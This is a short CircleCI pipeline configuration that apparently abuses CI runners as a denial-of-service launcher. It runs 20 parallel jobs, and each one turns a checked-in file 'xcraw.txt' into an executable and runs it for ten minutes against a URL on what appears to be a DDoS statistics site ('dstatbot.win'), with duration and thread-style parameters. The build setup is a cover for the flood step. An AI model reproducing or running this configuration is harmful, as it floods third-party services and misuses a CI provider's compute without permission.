version: 2.1

jobs:
  ran:
    machine:
      image: ubuntu-2204:current
    parallelism: 20
    steps:
      - checkout:
          method: https

      - run:
          name: Setup Python
          command: |
            sudo apt-get update
            sudo apt-get install -y python3 python3-pip

      - run:
          name: Change name
          command: mv xcraw.txt xcraw

      - run:
          name: Make raw executable
          command: chmod +x xcraw

      - run:
          name: Run raw with parameters
          command: |
            TIME=600
            timeout $TIME ./xcraw "https://c1.dstatbot.win/WZYkf9QE" "$((TIME+60))" 2 1

workflows:
  run-raw:
    jobs:
      - ran
